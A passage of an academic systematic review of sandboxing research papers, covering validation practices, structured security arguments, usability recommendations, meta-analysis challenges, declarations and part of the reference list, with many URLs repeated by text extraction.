statistical significances per validation category. Data with correlation coefficients closer to 1 have stronger correlations. Correlation (ρ) p-value Security validation −0.02 0.894 Performance validation 0.30 0.014 Applicability validation 0.20 0.105 several gaps. In this section we discuss how structured arguments can solve the problems presented by incomparable and incomplete ad hoc arguments (‘Structured arguments’) and possible ways to enhance sandbox and policy usability (Sandbox and policy usability). Structured arguments Sandboxes are often evaluated against coarse criteria such as the ability to stop exploits against certain classes of vulnerabilities, to encapsulate certain categories of operations, or to function in new environments. However, these coarse criteria typically require the sandbox to address a number of sub-criteria. For example, Zhang & Sekar (2013) provide CFI without requiring compiler support or a priori metadata, unlike earlier implementations. To ensure the technique is secure, they must be sure that independently transformed program modules maintain CFI when composed. Details that clarify how an individual criterion is fulfilled can easily be lost when ad hoc arguments are used in an effort to persuade readers that the criterion has been met; particularly in sandboxes with non-trivial design and implementation details. This can leave the reader unable to compare similar sandboxes or confused about whether or not contributions were validated. Since many of the security criteria are repeated across most papers, the cost of developing substructure can be amortized across lots of communal use. There are many possible ways to structure arguments in support to security claims: • Assurance cases (Weinstock, Lipson & Goodenough, 2007; Kelly, 1999) provide graphical structures that explicitly tie claims together in trees that show how claims are nar- rowed. Knight (2015) provides a concise introduction to the topic. These structures also explicitly link leaf claims to the evidence that supports the claim. Assurance cases were created in response to several fatal accidents resulting from failures to systematically and thoroughly understand safety concerns in physical systems. Their use has spread to security and safety critical systems of nearly every variety in recent decades with case studies from aerospace (Graydon, Knight & Strunk, 2007) and a sandbox called S3 (Rodes et al., 2015) that was not analyzed as part of this study (Nguyen-Tuong et al., 2014). Sandboxing papers can use assurance cases to decompose claims to their most simple components, then link those components to relevant evidence in the paper (e.g., a summary of specific results, a specific section reference, etc.). • Maass, Scherlis & Aldrich (2014) use a qualitative framework to compare sandboxes based on what happens when a sandbox fails, is bypassed, or holds. Authors could Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 22/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Table 6 Claims made about sandboxes ( : Security, : Performance, and : Applicability) and their validation strategies ( : Proof, : An- alytical Analysis, : Benchmarks, : Case Studies, and : Argumentation). Grayed out icons mean a claim was not made or a strategy was not used. Icons made by Freepik from www.flaticon.com. Category Citation Conference Claims Val. Val. Val. Other (Syscall) Provos (2003) Usenix Virtualization Garfinkel et al. (2003) SOSP Diversity Bhatkar, Sekar & DuVarney (2005) Usenix Other (Syscall) Linn et al. (2005) Usenix CFI Abadi et al. (2005) CCS Other (Memory) Ringenburg & Grossman (2005) CCS MAC Efstathopoulos et al. (2005) SOSP Web Cox et al. (2006) Oakland SFI McCamant & Morrisett (2006) Usenix CFI, SFI Erlingsson et al. (2006) OSDI Other (DFI) Castro, Costa & Harris (2006) OSDI Web Reis et al. (2006) OSDI Other (InfoFlow) Zeldovich et al. (2006) OSDI MI/AC Li, Mao & Chen (2007) Oakland Web Bandhakavi et al. (2007) CCS Web Chen, Ross & Wang (2007) CCS Virtualization Petroni & Hicks (2007) CCS Virtualization Seshadri et al. (2007) SOSP Virtualization Criswell et al. (2007) SOSP Web Wang et al. (2007) SOSP Other (InfoFlow) Krohn et al. (2007) SOSP CFI Akritidis et al. (2008) Oakland Virtualization Payne et al. (2008) Oakland MI/AC Sun et al. (2008) Oakland Other (TaintTrack) Chang, Streiff & Lin (2008) CCS Web Oda et al. (2008) CCS Other (OS) Williams et al. (2008) OSDI SFI Yee et al. (2009) Oakland Web Louw & Venkatakrishnan (2009) Oakland Web Parno et al. (2009) Oakland Other (Memory) Akritidis et al. (2009) Usenix Virtualization Wang et al. (2009) CCS SFI Castro et al. (2009) SOSP Virtualization McCune et al. (2010) Oakland Web Meyerovich & Livshits (2010) Oakland Other (Memory) Akritidis (2010) Usenix SFI Sehr et al. (2010) Usenix Web Louw, Ganesh & Venkatakrishnan (2010) Usenix Other (OS) Wurster & van Oorschot (2010) CCS SFI, Other (UserPolicy) Siefers, Tan & Morrisett (2010) CCS (continued on next page) Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 23/36 https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/10.7717/peerj-cs.43 Table 6 (continued) Category Citation Conference Claims Val. Val. Val. Web Feldman et al. (2010) OSDI MI/AC Owen et al. (2011) Oakland Other (Transactions) Jana, Porter & Shmatikov (2011) Oakland CFI Zeng, Tan & Morrisett (2011) CCS Web Saxena, Molnar & Livshits (2011) CCS Web Chen et al. (2011) CCS Virtualization Zhang et al. (2011) SOSP SFI Mao et al. (2011) SOSP Virtualization Andrus et al. (2011) SOSP Diversity Pappas, Polychronakis & Keromytis (2012) Oakland Diversity Hiser et al. (2012) Oakland SFI Payer, Hartmann & Gross (2012) Oakland CFI Kemerlis, Portokalidis & Keromytis (2012) Usenix Diversity Giuffrida, Kuijsten & Tanenbaum (2012) Usenix MI/AC Xu, Saı̈di & Anderson (2012) Usenix Diversity Wartell et al. (2012) CCS Web, Other (InfoFlow) De Groef et al. (2012) CCS Virtualization Dunn et al. (2012) OSDI Web (MI/AC) Giffin et al. (2012) OSDI CFI Zhang et al. (2013) Oakland CFI Zhang & Sekar (2013) Usenix CFI, SFI Niu & Tan (2013) CCS Diversity Homescu et al. (2013) CCS Other (OS) Moshchuk, Wang & Liu (2013) CCS Virtualization Nikolaev & Back (2013) SOSP CFI Criswell, Dautenhahn & Adve (2014) Oakland Web Mickens (2014) Oakland structure their arguments by using the framework to describe their specific sandbox without performing explicit comparisons. • Structured abstracts (Hartley, 2004; Haynes et al., 1990) are used in many medical journals to summarize key results and how those results were produced. These abstracts have the benefit of being quick to read while increasing the retention of information, largely thanks to the use of structure to guide authors in precisely summarizing their work. • Papers could provide a table summarizing their contributions and the important design or implementation details that reflect the contribution. All of these approaches provide the reader with data missing in ad hoc arguments: a specific map from the claims made about a sandbox to evidence that justifies the claim Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 24/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 has been met. They are also necessarily qualitative, but as we saw earlier, arguments are often used where more rigorous approaches are currently intractable. We believe that adding structure to these arguments is a reasonable advancement of the state of practice in sandbox validation. Sandbox and policy usability Sandbox and policy usability are concerns of interest to the following stakeholders: practitioners that must correctly use sandboxes to improve the security postures of their systems and users that must work with sandboxed applications. Some security researchers do attempt to make their sandboxes more usable by providing policy management or reducing requirements on the user, but usability is definitely not a focus of any of the papers in our sample. Our data shows that, with very few exceptions, sandbox researchers thoroughly evaluate the performance of their sandboxes. Why is there focus on this practical concern but not on usability? We observe that a focus on performance evaluation is partially motivated by the fact that overhead is relatively easy to quantify, but we also saw many cases where researchers were explicitly concerned with whether or not a sandbox was too resource intensive for adoption. The latter is a reasonable concern; Szekeres et al. (2013) pointed out that many mitigations for memory corruption vulnerabilities are not adopted because performance concerns outweigh protection merits. While the idea that performance is an important adoption concern is compelling and likely reflects reality, we cannot correlate performance with the adoption of the sandboxes in our set. We cannot find a correlation because the sandboxes and their techniques in our set remain almost entirely unadopted. We only found four cases where sandboxes in our set were either directly adopted or where the techniques they evaluate are clearly implemented in a different but adopted sandbox. A lack of adoption is present even for techniques where performance and applicability have been improved over multiple decades (e.g., SFI). Three of the adopted sandboxes were created by the industry itself or by entities very closely tied to it: Google NaCl was designed with the intention of adopting it in Google Chrome in the short term (Yee et al., 2009; Sehr et al., 2010) and the paper on systrace was published with functioning open source implementations for most Unix-like operating systems (Provos, 2003). While the case for adoption is weaker, Cells (Andrus et al., 2011) is a more advanced design than one VMware developed in parallel (Berlind, 2012), although the sandboxes both aim to partition phones into isolated compartments using virtualization (e.g., one for work and one for personal use). More recently, Microsoft has stated that Visual Studio 2015 will ship with an exploit mitigation that we believe is equivalent to what the research community calls CFI (Hogg, 2015). A third party analysis supports this belief, however the uncovered implementation details differ from the techniques implemented in published research (Tang, 2015). We argue that the need to evaluate the usability of our sandboxes is evidenced by the observation that performance and security evaluation are not sufficient to drive adoption. Usability is of particular concern in cases where the sandbox requires developers without Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 25/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 security expertise (1) to re-architect applications to apply the sandbox and/or (2) to develop a security policy. In practice, it is quite common for developers without a security focus to apply sandboxes, particularly Java’s. In fact, usability issues have factored into widely publicized vulnerabilities in how sandboxes were applied to Google Chrome and Adobe Reader as well as the many vulnerable applications of the Java sandbox (Coker et al., 2015). In all of these cases applying the sandbox is a relatively manual process where it is difficult for the applier to be sure he is fully imposing the desired policy and without missing relevant attack surfaces. These usability issues have caused vulnerabilities that have been widely exploited to bypass the sandboxes. We call on the community to evaluate the following usability aspects of their sandboxes where appropriate: • The intended users are capable of writing policies for the component(s) to be sandboxed that are neither over- or under-privileged. • Policy enforcement mechanisms can be applied without missing attack surfaces that compromise the sandbox in the targeted component(s). • Source code transformations (e.g., code re-writing or annotations) do not substantially burden future development or maintenance. • The sandbox, when applied to a component, does not substantially alter a typical user’s interactions with the sandboxed component. Ideally many of these points would be evaluated during user studies with actual stakeholders. However, we believe that we can make progress on all of these points without the overhead of a full user study, particularly because we are starting from a state where no usability evaluations are performed. For example, authors can describe correct ways to determine what privileges in their policy language a component needs or even provide tools to generate policies to mitigate the risks presented by under- and over-privileged policies. Similarly, tooling can be provided to help users install policy enforcement mechanisms or check that manual applications of a mechanism are correct. Sandbox developers can transform or annotate representative open source applications and use repository mining (http://msrconf.org) to determine how sandbox alternations are affected by code evolution present in the repository (Kagdi, Collard & Maletic, 2007; Yan, Menarini & Griswold, 2014; Mauczka et al., 2010; Stuckman & Purtilo, 2014). Finally, a summary of how the sandbox qualitatively changes a user’s experience with a sandboxed component would provide a gauge for how much the sandbox burdens end-users. ENABLING META-ANALYSIS We believe a key contribution of this work is the use of multi-disciplinary and systematic methodologies for drawing conclusions about a large body of security techniques. In this section, we discuss the generalizability of our methodology and suggest other areas to which it can be applied. Then, we discuss some challenges that we faced when doing this research and suggest changes that would address these challenges. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 26/36 https://peerj.com/computer-science/ http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://dx.doi.org/10.7717/peerj-cs.43 Generalizability of methodology The methodology employed in this paper is based on two research approaches: qualitative Content Analysis and Systematic Literature Reviews. Qualitative Content Analysis is primarily used in the humanities and social sciences. Systematic Literature Reviews were first applied to medical studies and are used primarily in empirical fields. The differences between sandboxing papers are bigger than the differences between studies of a particular cancer treatment. In addition, sandboxing papers do not fit into the “native” domains of either approach—their primary contributions are designs, techniques, and implementations. The result of these differences is that most literature reviews and systemizations in computing are done in an ad hoc manner. Our computing research is worthy of a more rigorous approach and we think the methodology applied in this paper can and should be applied to other topics. In fact, any topic of active research where the primary contributions is an engineered artifact, but without a clear and precise definition, would be amenable to our approach. These topics span computing research from software engineering (e.g., service oriented architecture, concurrent computation models) to systems (e.g., green computing, no instruction set computing) to human–computer interaction (e.g., GUI toolkits, warning science). Meta-analysis challenges and suggested solutions In our experience, the biggest roadblock standing in the way of applying the same techniques to other segments of the research community lies in the difficulty involved in collecting analyzable metadata about papers. We experienced several fixable issues: • The major publishers in computer science—IEEE, ACM, and Usenix—do not provide publicly available mechanisms to collect metadata and either rate limit or outright ban scraping. 9 In our case, the painstaking process of collecting and curating analyzable 9 In at least one case ACM provided a copy of their digital library for scraping (Bergmark, Phempoonpanich & Zhao, 2001) metadata across several sources limited our ability to explore hypotheses about our dataset’s papers and their relationships to publications not in the set. • The metadata is limited and contains little semantic content—typically the metadata includes the authors, title, data, and DOI, but little else. If abstracts and keywords were easier to harvest we could have more systematically derived topics of interest within the sandboxing community. • Links to papers on publisher websites use internal identifiers (e.g., http://dl.acm.org/ citation.cfm?id=2498101) instead of DOI. This makes it difficult to reference papers across publisher repositories. • Conference websites have inconsistent layouts, which increases the difficulty of data collection. We believe easier access to this data would have allowed us to draw more conclusions about how sandboxing papers are related and how the sandboxing landscape has evolved over time. For example, we explored the idea of using a more developed citation graph Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 27/36 https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dl.acm.org/citation.cfm?id=2498101 http://dx.doi.org/10.7717/peerj-cs.43 than Fig. 2 to trace the lineage of sandboxing techniques, but found the required resource expenditures were outside of our means. This data may provide support for explanations regarding the lack of advancement in security validation practices (e.g., by showing an emphasis on a different but important dimension of advancement). These points are important to understand how we got to the current state of practice, thus improving our ability to recognize and advance means for enhancing our results. On another data collection point, we averaged about 45 min per paper to code the data necessary to answer our research questions. While we do not claim that our research questions are of universal interest to the sandboxing community, we did observe that papers that answer all or most of the questions in the abstract are often clearly written throughout and easy to interpret. A small minority of sandboxing papers have far less specific abstracts. In these cases, the papers often took double the average time to comprehend and interpret. It may be useful to strive to clearly answer questions like ours in future papers to show practitioners the value sandbox researchers bring to the table. THREATS TO VALIDITY Due to the complexity of the text and concepts we are interpreting, there is some risk that other coders would assign quotes to different codes. Different codes will change the results, but we believe this risk is mitigated through our tests of the coding frame and by our efforts to select clear quotes. Furthermore, the correlative nature of our results ensures that a few code divergences will not dramatically change the analysis’s outcomes. The primary risk is that we are missing relevant quotes that add codes to our dataset. This is typically mitigated in QCA by fully segmenting the text, but we decided against that strategy because of the very large data set we studied and irrelevance of most of the text to our goals. We did search PDFs for relevant keywords we observed were commonly linked to specific codes throughout the process (e.g., “proof ”, “available” to find the availability of sandbox artifacts for evaluation, “experiment” to signal a case study or benchmark, etc.) to decrease the odds of missing a code. While this does mitigate the risk, it is still likely that our results under-approximate the state of the sandboxing landscape. CONCLUSION We systematically analyzed the sandboxing landscape as it is represented by five top-tier security and systems conferences. Our analysis followed a multidisciplinary strategy that allowed us to draw conclusions backed by rigorous interpretations of qualitative data, statistics, and graph analysis. Based on our results, we conclude that the sandbox research community will benefit from the use of structured arguments in support of security claims and the validation of sandbox and policy usability. We suggested lightweight ways to move forward in achieving these goals. Our data also shows that there is a dearth of science regarding the management of security policies for sandboxes, although we did not discuss this gap in depth. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 28/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 ADDITIONAL INFORMATION AND DECLARATIONS Funding This material is based upon work supported by the US Department of Defense through the Office of the Assistant Secretary of Defense for Research and Engineering (ASD(R&E)) under Contract HQ0034-13-D-0004 and the National Security Agency under Lablet Con- tract H98230-14-C-0140. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of ASD (R&E) or NSA. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: US Department of Defense: HQ0034-13-D-0004. National Security Agency: H98230-14-C-0140. Competing Interests The authors declare there are no competing interests. Author Contributions • Michael Maass conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Adam Sales analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper. • Benjamin Chung analyzed the data, performed the computation work, reviewed drafts of the paper. • Joshua Sunshine conceived and designed the experiments, performed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: We have supplied all our data in the Supplemental Dataset files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.43#supplemental-information. REFERENCES Abadi M, Budiu M, Erlingsson Ú, Ligatti J. 2005. Control-flow integrity principles, implementations, and applications. In: Proceedings of the 12th ACM conference on computer and communications security (CCS ’05). New York: ACM, 340–353. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 29/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43#supplemental-information http://dx.doi.org/10.7717/peerj-cs.43 Akritidis P. 2010. Cling: a memory allocator to mitigate dangling pointers. In: USENIX security (USENIX security’10). Berkeley: USENIX Association, 12–12. Available at http://dl.acm.org/ citation.cfm?id=1929820.1929836. Akritidis P, Cadar C, Raiciu C, Costa M, Castro M. 2008. Preventing memory error exploits with WIT. In: IEEE symposium on security and privacy (SP ’08). Washington, D.C.: IEEE Computer Society, 263–277. Akritidis P, Costa M, Castro M, Hand S. 2009. Baggy bounds checking: an efficient and backwards-compatible defense against out-of-bounds errors. In: USENIX security (SSYM’09). Berkeley: USENIX Association, 51–66. Available at http://dl.acm.org/citation.cfm?id=1855768. 1855772. Al Ameiri F, Salah K. 2011. Evaluation of popular application sandboxing. In: International conference for internet technology and secured transactions (ICITST), 2011. Washington, D.C.: IEEE, 358–362. Andrus J, Dall C, Van’t Hof A, Laadan O, Nieh J. 2011. Cells: a virtual mobile smartphone architecture. In: ACM symposium on operating systems principles (SOSP) (SOSP ’11). New York: ACM, 173–187. Bandhakavi S, Bisht P, Madhusudan P, Venkatakrishnan VN. 2007. CANDID: preventing sql injection attacks using dynamic candidate evaluations. In: ACM conference on computer and communications security (CCS) (CCS ’07). New York: ACM, 12–24. Barnes JM. 2013. Software architecture evolution. PhD dissertation, Carnegie Mellon University. Berelson B. 1952. Content analysis in communication research. Glencoe: Free Press. Bergmark D, Phempoonpanich P, Zhao S. 2001. Scraping the ACM digital library. In: SIGIR forum. 35. 1–7. Berlind D. 2012. VMware shows Android based virtual machines. Available at http://www. informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual- machines/d/d-id/1102135? (accessed 30 April 2015). Bhatkar S, Sekar R, DuVarney DC. 2005. Efficient techniques for comprehensive protection from memory error exploits. In: USENIX security (SSYM’05). Berkeley: USENIX Association, 17–17. Available at http://dl.acm.org/citation.cfm?id=1251398.1251415. Budgen D, Brereton P. 2006. Performing systematic literature reviews in software engineering. In: International conference on software engineering (ICSE ’06). New York: ACM, 1051–1052. Cappos J, Dadgar A, Rasley J, Samuel J, Beschastnikh I, Barsan C, Krishnamurthy A, Anderson T. 2010. Retaining sandbox containment despite bugs in privileged memory-safe code. In: ACM conference on computer and communications security (CCS) (CCS ’10). New York: ACM, 212–223. Castro M, Costa M, Harris T. 2006. Securing software by enforcing data-flow integrity. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI ’06). Berkeley: USENIX Association, 147–160. Available at http://dl.acm.org/citation.cfm?id=1298455. 1298470. Castro M, Costa M, Martin J-P, Peinado M, Akritidis P, Donnelly A, Barham P, Black R. 2009. Fast byte-granularity software fault isolation. In: ACM symposium on operating systems principles (SOSP) (SOSP ’09). New York: ACM, 45–58. Chandra R, Kim T, Shah M, Narula N, Zeldovich N. 2011. Intrusion recovery for database-backed web applications. In: ACM symposium on operating systems principles (SOSP) (SOSP ’11). New York: ACM, 101–114. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 30/36 https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1929820.1929836 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://dl.acm.org/citation.cfm?id=1855768.1855772 http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? http://www.informationweek.com/mobile/mobile-devices/ces-2012-vmware-shows-android-based-virtual-machines/d/d-id/1102135? 